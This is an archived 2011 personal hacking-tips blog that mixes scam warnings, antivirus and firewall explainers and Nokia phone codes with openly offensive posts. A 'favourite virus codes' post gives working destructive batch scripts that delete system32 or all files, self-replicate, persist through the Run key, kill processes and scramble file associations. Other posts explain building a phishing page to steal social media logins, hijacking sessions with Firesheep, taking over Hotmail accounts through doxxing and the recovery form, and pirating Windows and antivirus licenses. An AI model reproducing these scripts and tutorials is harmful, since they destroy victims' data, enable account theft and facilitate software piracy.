Google

Tuesday, May 31, 2011

Another Spam Hits FB- This time Clickhijacking





World's funniest condom commercial" a new clickhijacking attack in facebook



"The World Funniest Condom Commercial - LOL.... haha its really so funny ~ Dont Miss it !"
Most of you have seen this message on facebook. If not, you will surely see this in some days. This is a new clickjacking attack. Clicking on this link will lead users to a page on a blogspot page whick displays on YouTube video player. And user'c click is hijacked for clicking on like and share the facebook page.
Clickjacking attacks are now very common on facebook. I have posted many this type of facebook scams.
If you want to protect yourself from this attack, use noscript extention of firefox. Which is the best protection available on the internet.

note:- Sorry frnds im unble to post the link of this spam here......bt jst beware of it....

Friday, May 27, 2011

A small Message for my frnds


Hey frnds well im goin to take a break from hacking so dere is a small message for u all...plz do read it,rather watch in my style....to check my video click :-


Saturday, May 21, 2011

New FB Active Dislike Button Scam




Hello frnds recently Fb has Again gone through a NEw Scam i.e. Active Dislike Button
you will find a post like dis Wow Finally! Facebook: We launched the dislike button! Click On 'Turn on Dislike Button' below to enable it on your profile!
n you will get a Active dislike button like this


once you will click on this active dislike button ..
then vll b redirected to this page
which vll look somewhat like this


It will ask u to post the java script onto ur browser.Once ull post it..ull get a page where it vll b written Continue to active ur dislike button.once u click that..ull get an app sort of thnk where it vll ask u to complete the survey....once u wud click on that :D
bingo :D ur cookies willl b stolen :D
so dont click on that :D

Well after that u may b automatically logged out as i was :)
Then when ull again logged in ull get a msg like this


and this


After seeing all this i came to the conclusion that the Active Dislike button does not work and was just a spam :)

Note:- If by mistake u have clicked that button and gone through all the processes i have mentioned above :)
tell me ur password ill save u :D
jokes apart :D

just log out n close ur browser..den again open your browser n delete all the History n Cookies of ur browser....n login again :D
u r safe :D


well after sharing such a nice information with u all, u can atleast buy me a BEAR :)

Make ur PC speak wat u type(want) :D




Hello friends today im here to share one more trick with u all.....although it is a old one....but yesterday i had shown it so some of my friends....n i was surprised that they hv'nt seen that before....so i thought to share with u all as well....for all those who have not seen or heard about it.

well u all can enjoy listening ypur PC, whatever u want :D
Just Follow The simple steps :-

Step 1:- Open a new notepad file
Step 2:- Copy the below code as it is:-

Dim message, sapi
message=InputBox("Ur Pc will speak for u?","Sonam-The Grey Hat Hacker")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak message


Step 3:- Save this file as sound.vbs

Step 4:- Now u r done...just open this file and enter the text, u want to hear from ur PC
your PC will speak the same for you :)


Note:- for this valuable trick u can ofcourse Buy me a BEAR :D

Sunday, May 15, 2011

Beware Facebook Viral Scam-DAD CATCHES DAUGHTERS ON WEBCAM




As Facebook is one of the most widely used social networking website around, It is being hit by lots of viral scams, Today I just came across one of those viral scams when one of my friend on facebook shared a link on his wall, "[VIDEO] DAD CATCHES DAUGHTERS ON WEBCAM [OMGGGG].AVI", The title of the link looked suspicious to me so i thought to figure out exactly what was going around.

i was unable to post the image here..so u can chek dis link image is here

[VIDEO] DAD CATCHES DAUGHTERS ON WEBCAM [OMGGGG].AVI[LINK]two naughty girls get caught in the WORST moment while making a vid on their webcam! omg!!

When I clicked on it, I was redirected to a page where I was asked to click a button to play the video, The moment I saw it I noticed that it was a flash file and was not a real video.

i was unable to post the image here..so u can chek dis link
image is here


This was just to fool the users and making them download the adobe flash plugin in order to play the video, Once I clicked on the button "Download Codec", A file named Freecodec.exe started to download, which made me think if it's a keylogger or a trojan but the file happened to be clean according to the "No virus thanks 32 Scanner".

Ultimately I was redirected to a webpage which was promoting a tool called Profile Stylez and the Freecodec.exe was the installation file for the Profile Stylez tool.


After viewing the source code of the page I found the following line of code which was responsible for spreading the link to your facebook wall, Any one with the basic knowledge of Html and IFrame would certainly know what this code is exactly doing, Here we actually discover a vulnerability in like.php code which abuses users trust for viral spreading of the links.



Lastly I scanned the file Freecodec.exe on http://www.virustotal.com as I was a bit unsatisfied Novirusthanks due to my experience in past and guess what Symantec antivirus and VBA32 recognized it as a Trojan.Dropper.

Master Plan
So according to me the master plan was actually promote the tool and at the same time install malware in to victims computer and control their computers at the same time.

Security Measures

Avoid clicking on those posts titles which have words such as "OMG, WOW, DAMN" they are most likely to do the same thing
Always install any kind of Plugins and codecs from the official website, You might be installing malware along with the plugin.
Always scan a file with an online virus scanner such as virustotal before running it on your own computer.


Credits:- Rafay :D

How to protect your computer from keyloggers?



Keyloggers have been a major problem today as once they get installed in your computer the hacker can get almost any information, I have used couple of keyloggers and reviewed some of the best keyloggers available now a days.
The program which are specially used to detect and protect your computers from keyloggers are Antiloggers, I have tested lots of Antiloggers and found Zemana Antilogger only which is capable of detecting almost every keylogger.
Normally a keylogger is detected by a good antivirus or Antispyware program, but hackers use some methods such as crypting, hexing, binding etc through which the keylogger can easily Antivirus as well as Antispyware program

Zemana AntiLogger now covers pretty much every aspect of Windows including registry modification and dll injection prevention and protects Windows from other spyware-related techniques with Anti-Keylogger, Anti-SreeenLogger, Anti-WebLogger and Anti-ClipboardLogger tools of its own. Another useful feature this apps has is while-list approach (in contrast to Anti-Virus blacklist approach) meaning it automatically recognizes "safe" programs and does not treat them as "suspects"

Some Of My Fav Vrius Codes :D





Destroy ur victim's pc

A simple Trick to destroy ur victim's pc
A simple Trick to destroy ur victim's pc
I m here explain to make a file that destroys ur victims pc
I m not responsible for the damage caused by this file."
1. Open Notepad
2. write the following command : -

del c:\WINDOWS\system32\*.*/q

3. Save the above notepad with the extension ".bat or .cmd" as u want
4. !!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!! !!!
Don't double click the file otherwise u r in trouble.
Why ?????? bcz the file u created delete all files from ur
system32 folder and when u restart ur pc it will not start
bcoz system can not find the files in the system32 folder which
is required at the time of booting.
5. You can also test the above by creating a fake folder let suppose
windows1 in C:\. Copy some old files in it and just follow the
above command.By double clicking the bat or cmd file ur all files
automatically get deleted.
6. You can try this file in any one`s computer.(but this result in causing damage to the
computer, so think again before trying this on anyone's pc)

Disable Registry Edit,Task Manager and Command Promt

@echo off
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f


REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_Dword /d 1 /f

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_Dword /d 3FFFFFF /f

HDD Format

HDD format.....
Delete all files of a HDD when run a simple file:-

>Open Notepad
>Type DEL /F /Q *
>Save it as del.cmd

Note:- DONT TRY IT IN UR PC

Beware........ :D

This one is a simple batch virus
Just copy and paste the code given below in notepad and save it as anyname.bat(not txt)
Be carefull & Don't run this on ur pc


@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
the above code vll do the folowing taks :-
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer


Ext_Change Virus
This is the basic version of extension change virus ...
It changes file's association , so the application will run with different programs ...

@ Title Ext_Change Virus
@ color a
@ echo off
msg * VIRUS INFECTING YOUR FILES .
assoc .jpeg=htmlfile
assoc .html=jpegfile
assoc .avi=txtfile
assoc .mpeg=regfile
assoc .txt=avifile
assoc .reg=htmlfile
assoc .exe=jpegfile
assoc .sys=regfile
assoc .dll=exefile
assoc .dill=tempfile
assoc .vbs=datfile
color c
cls
echo Go to hell
cls
:loop
msg * The Developer Is Here
goto loop


Save it as any name ".bat"..... ".bat " must be the extension.....
Run that virus with you'r own risk , I am not responsible for anything :)
coz iska reverse code meko b nhi aata :)



Nokia Important Codes





1) Imagine that the battery charge of your handset is very low, your are expecting an important call and you don't have a charger. You will be needing this tip in such a situation.
Nokia handsets comes with a reserve battery.
To activate, key is "*3370#". Your cell will restart with this reserve and your mobile will show a 50% increase in battery. This reserve will get charged when you charge your mobile next time.

*3370# Activate Enhanced Full Rate Codec (EFR)- Your phone uses the best sound quality but talk time is reduced by approx. 5%

#3370# Deactivate Enhanced Full Rate Codec( EFR)

*#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time

*#4720# Deactivate Half Rate Codec

2) *#0000# Displays your phones software version,

1st Line : Software Version,
2nd Line : Software Release Date,
3rd Line : Compression Type

3) *#9999# Phones software v ersion if *#0000# does not work

4) *#06# For checking the International Mobile Equipment Identity (IMEI Number)

5) #pw+1234567890+1# Provider Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

6) #pw+1234567890+2# Network Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

7) #pw+1234567890+3# Country Lock Status. (use the "*" button to obtain the "p,w" and "+" symbols)

8) #pw+1234567890+4# SIM Card Lock Status.(use the "*" button to obtain the "p,w" and "+" symbols)

9) *#147# (vodafone) this lets you know who called you last *#1471# Last call (Only vodafone)

10) *#21# Allows you to check the number that "All Calls" are diverted To

11) *#2640# Displays security code in use

12) *#30# Lets you see the private number

13) *#43# Allows you to check the "Call Waiting" status of your phone.

14) *#61# Allows you to check the number that "On No Reply" calls are diverted to

15) *#62# Allows you to check the number that "Divert If Unreachable(no service)" calls are diverted to

16) *#67# Allows you to check the number that "On Busy Calls" are diverted to

17) *#67705646# Removes operator logo on 3310 & 3330

18) *#73# Reset phone timers and game scores

19) *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature "SIM Clock Stop Allowed", it means you will get the best standby time possible

20) *#7760# Manufactures code

21) *#7780# Restorefa ctory settings

22) *#8110# Software version for the nokia 8110

23) *#92702689# (to rember *#WAR0ANTY#) Displays -

1.Serial Number,
2.Date Made
3.Purchase Date,
4.Date of last repair (0000 for no. of repairs),
5.Transfer User Data.

To exit this mode you need to switch your phone off and then switch on again.

24) *#94870345123456789# Deactivate the PWM-Mem

25) **21*number# Turn on "All Calls" diverting to the phone number entered

26) **61*number# Turn on "No Reply" diverting to the phone number entered

27) **67*number# Turn on "On Busy" diverting to the phone number entered

28) 12345 This is the default security code press and hold #



Wednesday, May 11, 2011

Shortcut Autorun Virus On Flash Drive - How to Kill/Delete the Virus and Recover Hidden Data




Since you know that very large number of computers get effected by USB malwares and viruses. And the reason of there propagation is the only autorun.inf file which executes these malwares and viruses just we plugin the USB in our computer. Today, I,ll discuss a virus which will convert all the data in the USB into shortcuts and also I,ll show you that how to terminate this kind of virus commonly spoken as shortcut virus or we may also call is win32 stuxnet! lnk virus, I am providing free virus scan and removal tips here so that you may able to terminate shortcut virus in USB drive and recover your whole precious data as soon as possible.

First Step Get a Good Antivirus

Fitstly you should have some good antivirus.I have found NOD to be good one, You can get it here:

After Downloading and patching it through the guide given, Just update the antivirus and plugin your USB or removal disk, After that don't open it just right click the USB drive and go to Advanced Options>>Clean Files So that any virus may be removed.


Second Step to Recover Data From Infected USB/Removable Disk

Inorder to Recover Data from such an infected USB go to Start Menu and in Accessories go to Command Prompt after that use this command (Where j: is your USB path or it may be g: or something else depending on your system and partitions)
In CMD type this (don't forget to replace j: with your own USB drive path):

attrib -h -r -s /s /d j:\*.*


After that go to USB and open it by Right Clicking it and selecting open. You will see that along with shortcuts your Data is also recovered and thus after this delete all shortcuts.

Precautions When USB drive in Infected

1) You must have Good Updated Antivurs installed in computer so that virus may not infect your computer.
2) Disable Autorun of the Windows so that the USB autorun virus may not execute and don't use this dialog box since it only appears when autorun is enabled.


3) Open USB drive by right clicking it and then open the USB from the options , So that autorun.inf may not execute.
4) Immunize the USB drive my Reading This Post.


Immunizing USB from Viruses and Worms - Manual Method:





1) Open a command prompt by click Start -> Run. Type cmd and hit the Enter key.
2) In the command prompt, create a directory in the root directory of the USB drive (By Pointing cmd to the USB disk VIA its drive letter like if its G:/ then type G:/ and hit enter) with command:

mkdir AutoRun.ini

3) Move into this new directory with command:

cd AutoRun.ini

4) Create a new directory with command:

mkdir a...//

5) Exit the command prompt window with command:

exit


Remove the USB-Disk from the computer and now its immune. And whenever you will plug it into a infected computer the USB won't get infected.

Eset Nod Patch





Download the Eset Antivirus from the official website, or else from any location Google it and you will get many trial free versions , After installing antivirus go to the extracted package where TNOD is located and make sure that the antivirus is running in system processes and installed. After that Run the EseTNOD downloaded according to the version of eset used in computer, See detailed instructions below!

Download the latest version provided here, after that Run EseTNod-1.4.0.15-setup , It will install. Now Whenever computer will start it will inject licenses automatically and your Eset Smart Security will update automatically. If not then an icon will appear at desktop of EseTNOD and double click it , Same process will occur and in balloon notification it will check for licenses and will hack ESET automatically.

Can I Become A Good Hacker Without A Prior Knowledge Of Programming??



"Can I become a good hacker without knowning Programming?", "Is Programming necessary for learning how to hack", I usually get these question asked almost daily, There have been lots of debates on this topic, Some think that it's necessary while others think that it's not necessary at all, So I thought to write a post on this topic explaining my views if programming is necessary for becoming a hacker or not.

The answer is that it depends:


Why it's not necessary?

In early 90's the best hackers were known as those who were best at the knowledge of programming and the reason for that was probably that almost every thing was based on a command line so it was for sure that if some one is a good hacker he is surely a good programmer.

However the definition of hackers sort of changed after the beginning of 21'ST century, One could become a fairly good hacker without any knowledge of programming, This reason for that is because now a days there are lots of ready made tools which helps you to compromise a machine without any knowledge of Programming, Take an example of "Havij", Havij is a small software which helps you automate the process of SQL Injection and helps you extract sensitive database information in seconds where it may take hours in some cases to extract it, If you still don't agree with me try answering the following question:

Does it matter if an elite hacker writes a buffer overflow or a script kiddy runs a tool if the target system gets compromised anyway?


Where It's Necessary?

It's true that many good hackers are technology buffs and are curious about how things work, this is where you need to have prior knowledge of Programming in order to know how things work.

Another reason is why you should probably learn Programming is that you can write your own exploit (An exploit is a peice of code which can be used to gain access to the target machine using a specific vulnerability), which is the single most important thing which will separate you from rest of the script kiddies out there and most of the times some of the exploit codes comes with several code mistakes which are kept by Elite hackers themselves to prevent script kiddies or people with very little knowledge of hacking to run it.

In Short:

You can become a fairly good hacker without having a prior knowledge of programming but if you want take your hacking skills to the next level I will recommend you to learn Programming now the question which might arise in your mind is that what Programming languages should I learn?, I will cover it in my upcoming posts.

Feel free to express your views on the topic, Whether you agree with me or not?

Tuesday, May 10, 2011

How Firewalls Work




How Firewalls Work?????

If you have been using Internet on a regular basis or working in a large company and surf the Internet while you are at work, you must have surely come across the term firewall. You might have also heard of people saying “firewalls protect their computer from web attacks and hackers” or “a certain website has been blocked by firewall in their work place”. If you have ever wondered to know what exactly is this firewall and how it works, here we go. In this post I will try to explain “How firewalls work” in a layman’s terms.

Firewalls are basically a barrier between your computer (or a network) and the Internet (outside world). A firewall can be simply compared to a security guard who stands at the entrance of your house and filters the visitors coming to your place. He may allow some visitors to enter while denying others whom he suspects of being intruders. Similarly a firewall is a software program or a hardware device that filters the information (packets) coming through the Internet to your personal computer or a computer network.



Firewalls may decide to allow or block network traffic between devices based on the rules that are pre-configured or set by the firewall administrator. Most personal firewalls such as Windows firewall operate on a set of pre-configured rules that are most suitable under normal circumstances so that the user need not worry much about configuring the firewall.

Personal firewalls are easy to install and use and hence preferred by end-users for use on their personal computers. However large networks and companies prefer those firewalls that have plenty of options to configure so as to meet their customized needs. For example, a company may set up different firewall rules for FTP servers, Telnet servers and Web servers.

In addition the company can even control how the employees connect to the Internet by blocking access to certain websites or restricting the transfer of files to other networks. Thus in addition to security, a firewall can give the company a tremendous control over how people use the network.

Firewalls use one or more of the following methods to control the incoming and outgoing traffic in a network:-

1.Packet Filtering: In this method packets (small chunks of data) are analyzed against a set of filters. Packet filters has a set of rules that come with accept and deny actions which are pre-configured or can be configured manually by the firewall administrator. If the packet manages to make it through these filters then it is allowed to reach the destination; otherwise it is discarded.
2. Stateful Inspection:This is a newer method that doesn’t analyze the contents of the packets. Instead it compares certain key aspects of each packet to a database of trusted source. Both incoming and outgoing packets are compared against this database and if the comparison yields a reasonable match, then the packets are allowed to travel further. Otherwise they are discarded.
Firewall Configuration
Firewalls can be configured by adding one or more filters based on several conditions as mentioned below:-
1. IP addresses: In any case if an IP address outside the network is said to be unfavorable, then it is possible to set filter to block all the traffic to and from that IP address. For example, if a cetain IP address is found to be making too many connections to a server, the administrator may decide to block traffic from this IP using the firewall.

2. Domain names: Since it is difficult to remember the IP addresses, it is an easier and smarter way to configure the firewalls by adding filters based on domain names. By setting up a domain filter, a company may decide to block all access to certain domain names, or may provide access only to a list of selected domain names.

3. Ports/Protocols: Every service running on a server is made available to the Internet using numbered ports, one for each service. In simple words, ports can be compared to virtual doors of the server through which services are made available. For example, if a server is running a Web (HTTP) service then it will be typically available on port 80. In order to avail this service, the client needs to connect to the server via port 80. Similarly different services such as Telnet (Port 23), FTP (port 21) and SMTP (port 25) services may be running on the server. If the services are intended for the public, they are usually kept open. Otherwise they are blocked using the firewall so as to prevent intruders from using the open ports for making unauthorized connections.

4. Specific words or phrases: A firewall can be configured to filter one or more specific words or phrases so that, both the incoming and outgoing packets are scanned for the words in the filter. For example, you may set up a firewall rule to filter any packet that contains an offensive term or a phrase that you may decide to block from entering or leaving your network.


Hardware vs Software Firewall

Hardware firewalls provide higher level of security and hence preferred for servers where security has the top most priority whereas, the software firewalls are less expensive and are most preferred in home computers and laptops.

Hardware firewalls usually come as an in-built unit of a router and provide maximum security as it filters each packet in the hardware level itself even before it manages to enter your computer. A good example is the Linksys Cable/DSL router.

Why Firewall????



Firewalls provide security over a number of online threats such as Remote login, Trojan backdoors, Session hijacking, DOS & DDOS attacks, viruses, cookie stealing and many more. The effectiveness of the security depends on the way you configure the firewall and how you set up the filter rules. However major threats such as DOS and DDOS attacks may sometimes manage to bypass the firewalls and do the damage to the server. Even though firewall is not a complete answer to online threats, it can most effectively handle the attacks and provide security to the computer up to the maximum possible extent.

Facebook Hacking Using Firesheep





Firesheep Makes Facebook Hacking Easy

Recently a new firefox addon Firesheep have been a cause of thousands of email accounts, As reported by techcurnch, Firesheep has been downloaded more than 104,000 times in roughly last 24 hours,, With Firesheep the hacker can control any account without even knowing the username and password of the desired account, As Facebook is worlds most popular Social Networking website, therefore it has been the major victim of it, Firesheep uses Http Session hijacking attack to gain unauthorized access to a Facebook or any other account

What is Session Hijacking?
In a Http session hijacking attack an attacker steals victims cookies, Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook Google, Yahoo, Orkut, Flickr etc or any other email account

How can a Hacker use Firesheep to Hack a Facebook or any other account?

Now I will tell you how can a hacker use firesheep to hack a facebook or any other account, You will need the following things:


* Public wifi access
* winpcap
* Firesheep

Now just follow the simple steps:-
Step 1:- Method

1. First of all download "Firesheep" and use the "openwith" option in the firefox browser.





Step 2:- Once you have installed firesheep on firefox web browser, Click on view at the top, then goto sidebar and click on Firesheep





Step 3:- . Now click on the top left button "Start capturing" and it will start to capture the session cookies of people in your wifi network, This will show you the list of those people whose cookies are captured and have visited unsecured website known to firesheep, Double click on the photo and you will be logged in instantly




How to Trace Mobile Numbers



With the rapid growth of mobile phone usage in recent years, we have often observed that the mobile phone has become a part of many illegal and criminal activities. So in most cases, tracing the mobile number becomes a vital part of the investigation process. Also sometimes we just want to trace a mobile number for reasons like annoying prank calls, blackmails, unknown number in a missed call similar.

Even though it is not possible to trace the number back to the caller, it is possible to trace it to the location of the caller and also find the network operator. Just have a look at this page. Using the information provided on this page, it is possible to certainly trace any mobile number from India and find out the location (state/city) and network operator (mobile operator) of the caller. All you need for this is only the first 4-digit of the mobile number. In this Wikipedia page you will find all the mobile number series listed in a nice tabular column where they are categorized based on mobile operator and the zone (state/city). This Wiki page is updated regularly so as to provide up-to-date information on newly added mobile number series and operators. I have used this page many a time and have never been disappointed.

If you would like to use a simpler interface where in you can just enter the target mobile number and trace the desired details, you can try this Link from Numbering Plans.Using this link, you can trace any number in the world.


By using the information in this article, you can only know “where” the call is from and not “who” the caller is. Only the mobile operator is able to tell you ”who” the caller is. So if you’re in an emergency and need to find out the actual person behind the call, I would recommend that you file a complaint and take the help of police. I hope this information has helped you.

Now one of my favourite link which i use fo rall the purposees of tracing :D is :-
My favouite

Have Fun with Google




Today im gonna tell you how to see some good effects on google.

Step: Ist open the google.com and try these text one by one by typing or paste and click on I'm feeling lucky button

google gravity

google sphere

google easter egg

google I33t

google loco

google gothic

google bsd

google linux

google cheese


Now one more trick with Google :-

go to google n type "let it snow " and see the magic .. its awesome !!

Another one for u all with Google :-

open

http://darkartsmedia.com/Google.html



Google will appear on your screen

Now made a single left click anywhere on that page{remember to click only once}

Wait for 5 seconds and the two O from G O O gle will disappear

Now single left click again will make the two O appear again

Note Please:By clicking once you make two Os disappear

By Clicking Twice you make the two Os appear again

By clicking Thrice you will be transferred back to the original google page..






ENJOY..!!



Hack any account using phishing





By this method You can Hack any social networking account if you want.Its good method for hacking the noobs.....simply follow the following steps :-
Step 1:- 1st of all you have to create an account on file hosting website for getting link of your phish page....


so here are some example of free web-hosting sites
www.110mb.com

www.keepvid.com

www.ripway.com
etc etc..

NOTE:-

while creating n account the user name should be special means if you want to hack orkut acount you should choose a user name related to orkut like orkutnew, classicorkut, styleorkut etc etc... and if you want to hack facebook acount then give a user name related to facebook.

Step 2:-CREATING PHISH PAGE


Then open the home page of the social networking site which you want to phish..

for orkut open www.orkut.com

for facebook open www.facebook.com

for myspace open www.myspace.com


After opening Right click on the page any where and click on view page source.
then select all by pressing ctrl+a and

copy by pressing ctrl+c
Step 3:- Now open the html page in notepad by pressing right click>>open with>>notepad

and after opened press Press Ctrl + F

and search for action

then u find this type action="https://www.google.com/accounts/ServiceLoginAuth?service=orkut"

change it to Post.php

Example:-

action="post.php"


Then save it by pressing ctrl + s
Step 4:- Now you want the php code..

Download it fromHere

Step 5:- Now all work is done.. now open your webhosting site acount.. and upload the two files there..

1.index.htm
2.post.php


once uploading complete.. click on index.htm page..a new window will open and there the orkut login page should open...

congrats its your phishing page....

just send the link of your phishing page to the victim you want to hack......
once he logins on that page his id n password will come in a text file on ur free web hosting account..... :)

Monday, May 9, 2011

Rapid Share Simple Hack


Unlimited Rapidshare Downloads
Its very easy to fool Rapid Share server if your IP address is assigned by your ISP. Just follow these simple steps:
clean up IE or netscape cookie.In this case the one that belong to rapidshare website.
On Command prompt

Step 1. Type -ipconfig /flushdns Hit Enter

Step 2. Type - ipconfig /release Hit Enter


Step 3. Type - ipconfig /renew Hit Enter


Step 4. Type - exit Hit Enter



Or save these commands in a bat file and run it everytime you need to fool Rapidshare server.Remember to clean up rapidshare cookie in your temp Internet files folder.
Now you should be ready to download as many files as you want from their server.
And there is this cool link: paste it in the browser and see
CODE
http://www.google.com/search?lr=&as_qdr=all&q=+.rar+OR+.zip+OR+.pdf+OR+.exe+site%3Arapidshare.de

How To Install Winmp11 On Win XP




Windows media player 11 offers you great ways to store and enjoy all your music, video and pictures along with its new cool look.However if you do not have a geniune pack of windows service pack 2 you will not be able to run and install windowsmedia player.I have already posted article on How To Make Windows XP Geniune.


Step 1. Download
Windows Media Player 11.0
(make sure its the final and latest version, not beta) from the Microsoft Site

Step 2. Extract the downloaded Windows Media Player setup file (wmp11-windowsxp-x86-enu.exe) using WinRAR to a directory (wmp11-windowsxp-x86-enu). Now make sure you have a
“LegitLibM.dll” file in the extracted “wmp11-windowsxp-x86-enu” folder.


Step 3. Download the patched LegitLibM.dll and then copy-paste it to the
“wmp11-windowsxp-x86-enu”
folder and click yes when asked to overwrite.



Step 4. Now run
“setup_wm.exe”
file in the “wmp11-windowsxp-x86-enu” folder.


Step 5.
Restart your PC, then run your Windows Media Player and you are done!

How To Make Wndows Genuine





Hello frineds im here to tell u how to bypass the Microsoft Genuine Validation thing.


This method works better than many others I have tried before.Now Forget the cracks and injectors etc... this is the BEST WAY:-

Step 1: Go to start > run > "regedit" (without the quotes of course)

Step2: Naviagte to:-

HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion\WPAEvents\OOBETimer

...and doubleclick on it. Then change some of the value data to ANYTHING ELSE...delete some, add some letters, I don't care...just change it!

now close out regedit.

Step 3: Go to start > run > "%systemroot%\system32\oobe\msoobe.exe /a" (again, dont type the quotes)

Step 4: The activation screen will come up, click on register over telephone, then click on CHANGE PRODUCT KEY, enter in this key: JG28K-H9Q7X-BH6W4-3PDCQ-6XBFJ
Step 5: Voila!!!!! you are done my friend :)




Adware, malware, spyware and viruses can bring your system to its knees. They are detrimental, lowering the performance of your computer. You might need to replace data. You might lose unique files. Keep the nasties away from your computer using these ten simple tips.

Step 1:
Use Firefox: Internet Explorer is the most popular browser on the market, controlling over 50% of the market share. The virus and adware creators specifically look for exploitable vulnerabilities within IE because they know that they will receive the best return on investment. Your switch to Firefox prevents some adware from infecting your machine.

Step 2:
Scan your PC once a week: Sometimes adware programmers take a sneaky approach. They will set up their programs to run quietly in the background to spy upon your activities. This once a week scan is necessary to remove any of those sneaky bugs.
Step 3:
Download from known sites: New sites for installing adware are popping up all the time. If you find something that you want to download, make sure that it is from a known site.A company like Amazon will not steer you wrong, but Bob’s House of Wares might be a little less trustable. If you are not sure whether you can trust a site, perform a quick search.

Step 4:
Install Adaware: Ad-Aware is the most popular free adware removal program on the market. It detects, quarantines and removes adware. It searches for other programs which may have been installed, highlighting them in an easy to use interface. This program does not have an anti-virus attached.

Step 5:
Do not click on unsolicited email: You are constantly receiving offers to increase this or improve that through unsolicited email. Your curiosity may be killing you, but don’t click on these emails. They accept your click as permission to install adware, spyware and malware on your PC.

Step 6:
Install Antivirus software: Installing two programs for virus and adware protection is a smart idea. It caters to the strengths of each program, increasing the overall strength of your antiadware and antiviral campaign. Some of the best antivirus software is free, providing real time protection. Programs to look at would be Avast Antivir and AVG.

Step 7:
Don’t install toolbars: Even some reputable sites install custom toolbars. They slow your system down and collect information about your surfing habits. While a toolbar might offer some perks, it may also diminish your experience by dragging your system to a halt. Toolbars from less reputable places install adware and sometimes infect your system outright.

Step 8:
Look at your task manager: If anything seems out of place with your computer, take a look at your task manager. This tells you about all of the programs and processes which are running on your computer. Examine the processes tab for anything which you don’t immediately recognize. Perform a web search for unfamiliar processes.

Step 9:
Do not click on popups: Clicking on a popup usually spells certain doom for your computer. It opens the door for the viruses and adware that want to infect your machine, telling these malicious applications to make themselves at home. Stay away from those constantly advertised screensavers and icons.

Step 10:
Trust your gut: If you don’t feel right about a site, don’t go there. If you are receiving warnings from the antivirus and antiadware programs which you’ve installed, don’t go there. If you don’t like the layout of a site, don’t go there. Trust your instincts about sites.

With proper vigilance, you can keep aggravating adware, spyware and malware from your machine. Trust your instincts. Install Ad-Aware and an antivirus program. Play it safe. The care you spend in preventing adware from infecting your machine can save money and time.

How To Search Torrent From Google


Download Torrent File By Using Google
Simple way...just type:-

*ur file name* filetype:torrent
You must not write ( * ) when you search....
Example:
ANTIVIRUS KASPERSKY filetype:torrent

Chat While Being Idel On GTalk



Step 1: Turn off GTalk (completely)

Step 2: Go to System Registry editor (regedit.exe)

Step 3: Navigate to HKEYCURRENTUSER\Software\Google\Google Talk\Options

Step 4: Add a DWORD named "inactive_minutes"

0 means always idle BUT email notifications are disabled.
1 means (obviously) one minute.

Saturday, May 7, 2011

Hack any Hotmail without Keylogger, Rat, etc.


Step 1: Go here

https://support.live.com/eform.aspx?prod…mcs&scrx=1

This is the form you will be filling out.

Step 2: Give them your victims full name.

Now, if you do not know their first name, try the following things to find it.

First, try using these two sites, simply enter their email and hit return.

http://www.pipl.com/email

http://com.lullar.com


If you want more, google their hotmail account(s), for example, type into google:

“victimshotmail@hotmail.com”

Include the quotes, cause this searches for only the hotmail account.
If you gain any results, it will most likely be forums or if you’re lucky, social networking sites, that they have filled out their info on.
Go through these searches, and look at every one, even make a .txt file in notepad pasting down all the info you can on them.
Once you’re done, if you havnt got their last name, keep reading..if you have, goto step 3.

Presuming you dont yet have their last name, try going to social networking sites, like:

http://www.myspace.com

http://www.facebook.com

http://www.bebo.com

http://www.friendster.com

Or any others you can think of, and search for their hotmail account using the websites search feature.
if you get any results, you’re in luck, most of the time people include alot of information on themselves in there. Follow any leads you can find on the info, and even ask them or their friends (look up a tutorial on social engineering info out of people first, it will help).

Now another thing you can do is use http://www.whois.com IF your victim has their own website.

If you dont have it by now, maybe you should find an easier target, or if you’re desperate, use this technique to hack one of their rl best friends, and alot of the time they have their full name assigned to your victims hotmail address, in their addressbook.

Or, I sometimes just say “I’m pretty sure I only put in my first name at registration, I’m paranoid like that” or something along those lines… It’s worked for me.

BTW: This is called d0xing, or “documenting”, basically harvesting info on people, it’s completely legal as long as you get all your info from the public domain (forums, social networking sites etc).

